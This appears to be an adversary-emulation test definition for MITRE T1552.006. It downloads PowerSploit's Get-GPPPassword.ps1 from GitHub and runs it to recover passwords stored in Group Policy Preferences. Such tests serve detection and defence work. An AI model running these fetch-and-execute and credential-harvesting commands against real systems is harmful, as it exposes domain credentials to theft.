#TechniqueName: Unsecured Credentials: Group Policy Preferences
#AtomicTestName: GPP Passwords (Get-GPPPassword)
#Language: ps1

#get_prereq_commands
New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1") -Force | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1 -OutFile "PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1"


#prereq_commands
if(Test-Path "PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1") {exit 0 } else {exit 1 }


#commands
. PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1
Get-GPPPassword -Verbose

